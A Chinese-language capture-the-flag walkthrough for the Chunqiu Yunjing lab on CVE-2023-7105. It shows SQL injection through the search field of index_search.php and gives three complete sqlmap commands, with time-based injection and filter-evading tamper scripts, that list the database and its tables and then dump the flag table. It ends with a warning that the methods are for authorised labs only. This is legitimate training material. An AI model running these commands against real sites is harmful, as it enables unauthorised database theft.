欢迎光临
我们一直在努力

春秋云镜 CVE-2023-7105

靶场环境:Windows10虚拟机

审题:通过“index_search.php”地址中的search进行SQL注入!

在这里插入图片描述
点开地址,发现是以下页面

在这里插入图片描述
滑动鼠标,可以看到下面有一个输入框。
该输入框存在sql注入漏洞,进行BurpSuite抓包

在这里插入图片描述
BP抓包后,复制请求包内容

在这里插入图片描述
将复制的请求包内容,粘贴到文本文档5.txt中(不做任何修改)

在这里插入图片描述
此处需要使用sqlmap工具(sqlmap安装教程,网上自行搜索)
使用sqlmap工具对 5.txt 文件,进行注入

python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 –current-db

在这里插入图片描述
成功获取到数据库名“electricks”

在这里插入图片描述
接下来,获取数据库表名

python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 -D electricks –tables

在这里插入图片描述
数据库表中可以看到有个flllaaaag表,读取这个表内容

在这里插入图片描述
读取flllaaaag表内容,获取flag

python sqlmap.py -r 文本文档路径 –batch –level=5 –risk=3 –technique=T –random-agent –tamper=between,space2comment,versionedmorekeywords –dbms=mysql –force-ssl –time-sec=2 -D electricks -T flllaaaag –dump

在这里插入图片描述
成功获取flag

在这里插入图片描述

📌温馨提示:

文中演示的漏洞攻击手段仅用于授权靶场练习,目的是学习漏洞防御知识。未获得授权的网站不允许任何渗透、扫描行为,触碰法律红线会承担民事、刑事责任,建议大家仅在合规靶场开展学习。

赞(0)
未经允许不得转载:171主机测评 » 春秋云镜 CVE-2023-7105
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址